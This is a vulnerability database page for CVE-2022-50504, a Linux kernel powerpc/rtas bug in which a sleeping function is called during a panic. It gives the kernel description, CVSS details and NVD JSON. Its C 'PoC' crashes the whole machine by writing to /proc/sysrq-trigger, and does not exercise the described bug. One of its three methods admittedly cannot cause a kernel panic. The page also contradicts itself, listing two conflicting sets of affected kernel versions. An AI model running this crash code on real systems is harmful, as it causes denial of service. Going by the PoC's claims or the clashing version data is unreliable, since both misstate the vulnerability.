Security Vulnerability Report
CVE-2022-50504 CVSS 5.5 MEDIUM


Published: 2025-10-04 16:15:48
Last Modified: 2026-01-22 19:44:51
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

powerpc/rtas: avoid scheduling in rtas_os_term()

It's unsafe to use rtas_busy_delay() to handle a busy status from the ibm,os-term RTAS function in rtas_os_term():

Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b
BUG: sleeping function called from invalid context at arch/powerpc/kernel/rtas.c:618
in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0
preempt_count: 2, expected: 0
CPU: 7 PID: 1 Comm: swapper/0 Tainted: G D 6.0.0-rc5-02182-gf8553a572277-dirty #9
Call Trace:
[c000000007b8f000] [c000000001337110] dump_stack_lvl+0xb4/0x110 (unreliable)
[c000000007b8f040] [c0000000002440e4] __might_resched+0x394/0x3c0
[c000000007b8f0e0] [c00000000004f680] rtas_busy_delay+0x120/0x1b0
[c000000007b8f100] [c000000000052d04] rtas_os_term+0xb8/0xf4
[c000000007b8f180] [c0000000001150fc] pseries_panic+0x50/0x68
[c000000007b8f1f0] [c000000000036354] ppc_panic_platform_handler+0x34/0x50
[c000000007b8f210] [c0000000002303c4] notifier_call_chain+0xd4/0x1c0
[c000000007b8f2b0] [c0000000002306cc] atomic_notifier_call_chain+0xac/0x1c0
[c000000007b8f2f0] [c0000000001d62b8] panic+0x228/0x4d0
[c000000007b8f390] [c0000000001e573c] do_exit+0x140c/0x1420
[c000000007b8f480] [c0000000001e586c] make_task_dead+0xdc/0x200

Use rtas_busy_delay_time() instead, which signals without side effects whether to attempt the ibm,os-term RTAS call again.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, in the version ranges recorded in the NVD entry (start inclusive, end exclusive):
- 2.6.18 up to 4.9.337
- 4.10 up to 4.14.303
- 4.15 up to 4.19.270
- 4.20 up to 5.4.229
- 5.5 up to 5.10.163
- 5.11 up to 5.15.87
- 5.16 up to 6.0.17
- 6.1 up to 6.1.3

Linux kernel < 5.10.102 (powerpc architecture)
Linux kernel 5.11.x < 5.15.25 (powerpc architecture)
Linux kernel 5.16.x < 5.16.11 (powerpc architecture)
Linux kernel 5.17.x ~ 6.0-rc5 (powerpc architecture)
All PowerPC (ppc64/ppc64le) systems running an affected kernel

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2022-50504 - Linux Kernel powerpc/rtas Atomic Context Sleep Vulnerability
 *
 * This PoC demonstrates how to trigger the vulnerability on a PowerPC system
 * running a vulnerable Linux kernel (prior to the fix).
 *
 * The vulnerability is triggered when:
 * 1. A kernel panic occurs on a PowerPC (ppc64/ppc64le) system
 * 2. The panic handler calls rtas_os_term() to notify firmware
 * 3. The ibm,os-term RTAS call returns BUSY status
 * 4. rtas_busy_delay() is called from atomic context, causing a BUG
 *
 * Compile: gcc -o poc_cve_2022_50504 poc_cve_2022_50504.c
 * Run:     sudo ./poc_cve_2022_50504
 *
 * Note: This requires a PowerPC system with RTAS support and a vulnerable kernel.
 * On non-PowerPC systems, this will not trigger the specific vulnerability.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>       /* open() and O_WRONLY; this include was missing from the original listing */
#include <signal.h>
#include <sys/syscall.h>
#include <string.h>
#include <errno.h>

/* Method 1: Trigger via /proc/sys/kernel/panic (requires root) */
int trigger_via_proc(void)
{
    FILE *f;

    printf("[*] Attempting to trigger kernel panic via /proc/sys/kernel/panic...\n");

    /* kernel.panic = 0 disables the automatic reboot after a panic, so the
     * panic output stays on the console; it does not change when the panic
     * happens. */
    f = fopen("/proc/sys/kernel/panic", "w");
    if (f == NULL) {
        printf("[-] Cannot open /proc/sys/kernel/panic: %s\n", strerror(errno));
        printf("[-] Need root privileges or sysctl -w kernel.panic=0\n");
        return -1;
    }
    fprintf(f, "0\n");
    fclose(f);

    /* Trigger oops/panic */
    f = fopen("/proc/sysrq-trigger", "w");
    if (f == NULL) {
        printf("[-] Cannot open /proc/sysrq-trigger: %s\n", strerror(errno));
        return -1;
    }
    fprintf(f, "c\n"); /* 'c' triggers a crash (kernel panic) */
    fclose(f);
    return 0;
}

/* Method 2: Trigger via magic SysRq key */
int trigger_via_sysrq(void)
{
    int fd;

    printf("[*] Attempting to trigger kernel panic via SysRq...\n");

    /* Enable SysRq */
    fd = open("/proc/sys/kernel/sysrq", O_WRONLY);
    if (fd >= 0) {
        write(fd, "1\n", 2);
        close(fd);
    }

    /* Trigger crash via SysRq */
    fd = open("/proc/sysrq-trigger", O_WRONLY);
    if (fd < 0) {
        printf("[-] Cannot open /proc/sysrq-trigger: %s\n", strerror(errno));
        return -1;
    }
    write(fd, "c\n", 2);
    close(fd);
    return 0;
}

/* Method 3: Trigger via intentional segfault (SIGSEGV) */
void trigger_segfault_handler(int sig)
{
    printf("[!] Received signal %d, system may be crashing...\n", sig);
    _exit(1);
}

int trigger_via_segfault(void)
{
    printf("[*] Attempting to trigger kernel panic via segfault...\n");
    signal(SIGSEGV, trigger_segfault_handler);

    /* Write to an invalid address. Note that this faults in user space: the
     * kernel delivers SIGSEGV to this process (caught by the handler above);
     * it does not by itself produce a kernel oops or panic. */
    *(volatile int *)0xdeadbeef = 0;
    return 0;
}

int main(int argc, char *argv[])
{
    printf("========================================\n");
    printf("CVE-2022-50504 PoC\n");
    printf("Linux Kernel powerpc/rtas Atomic Context Sleep\n");
    printf("========================================\n\n");

    if (getuid() != 0) {
        printf("[!] Warning: Not running as root. Some methods may fail.\n");
        printf("[!] Run with sudo for full functionality.\n\n");
    }

    /* Check if running on PowerPC */
#ifdef __powerpc__
    printf("[+] Running on PowerPC architecture - vulnerability may trigger\n\n");
#else
    printf("[-] Not running on PowerPC architecture\n");
    printf("[-] This CVE only affects powerpc/ppc64/ppc64le systems\n");
    printf("[-] The PoC will still attempt to trigger a panic for demonstration\n\n");
#endif

    int method = 1;
    if (argc > 1) {
        method = atoi(argv[1]);
    }

    switch (method) {
    case 1:
        trigger_via_proc();
        break;
    case 2:
        trigger_via_sysrq();
        break;
    case 3:
        trigger_via_segfault();
        break;
    default:
        printf("Usage: %s [1|2|3]\n", argv[0]);
        printf("  1: Trigger via /proc/sys/kernel/panic (default)\n");
        printf("  2: Trigger via SysRq\n");
        printf("  3: Trigger via segfault\n");
        return 1;
    }

    printf("[*] If running on vulnerable PowerPC kernel, the system should\n");
    printf("[*] panic and show 'BUG: sleeping function called from invalid context'\n");
    printf("[*] in the call trace involving rtas_os_term().\n");
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50504", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:47.607", "lastModified": "2026-01-22T19:44:50.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/rtas: avoid scheduling in rtas_os_term()\n\nIt's unsafe to use rtas_busy_delay() to handle a busy status from\nthe ibm,os-term RTAS function in rtas_os_term():\n\nKernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b\nBUG: sleeping function called from invalid context at arch/powerpc/kernel/rtas.c:618\nin_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0\npreempt_count: 2, expected: 0\nCPU: 7 PID: 1 Comm: swapper/0 Tainted: G D 6.0.0-rc5-02182-gf8553a572277-dirty #9\nCall Trace:\n[c000000007b8f000] [c000000001337110] dump_stack_lvl+0xb4/0x110 (unreliable)\n[c000000007b8f040] [c0000000002440e4] __might_resched+0x394/0x3c0\n[c000000007b8f0e0] [c00000000004f680] rtas_busy_delay+0x120/0x1b0\n[c000000007b8f100] [c000000000052d04] rtas_os_term+0xb8/0xf4\n[c000000007b8f180] [c0000000001150fc] pseries_panic+0x50/0x68\n[c000000007b8f1f0] [c000000000036354] ppc_panic_platform_handler+0x34/0x50\n[c000000007b8f210] [c0000000002303c4] notifier_call_chain+0xd4/0x1c0\n[c000000007b8f2b0] [c0000000002306cc] atomic_notifier_call_chain+0xac/0x1c0\n[c000000007b8f2f0] [c0000000001d62b8] panic+0x228/0x4d0\n[c000000007b8f390] [c0000000001e573c] do_exit+0x140c/0x1420\n[c000000007b8f480] [c0000000001e586c] make_task_dead+0xdc/0x200\n\nUse rtas_busy_delay_time() instead, which signals without side effects\nwhether to attempt the ibm,os-term RTAS call again."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": 
"LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.18", "versionEndExcluding": "4.9.337", "matchCriteriaId": "7C467503-F0C8-433A-9134-93F5DCCFA53D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7B9E5B1C-CD46-4790-9500-615863850401"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.17", "matchCriteriaId": "05B2AE8A-556C-47C1-9119-DBAC5EB60947"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"6.1", "versionEndExcluding": "6.1.3", "matchCriteriaId": "70594F60-3413-4969-AFD7-965266760EA6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4768935b8cc2d2afeb7956292df0f6e2c49ca0a5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/482d990a5dd1027ee0b70a8a570d56749cac8103", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/515959eb49e6d218a46979d66f36fdef329ac7d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6c606e57eecc37d6b36d732b1ff7e55b7dc32dd4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6f7e2fcab73372a371ab4017cbedf7a71f4f9b40", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7280fdb80bf0fe35d9b799fc7009f2cbe0a397d7", "source": "416baaa9-dc ... (truncated)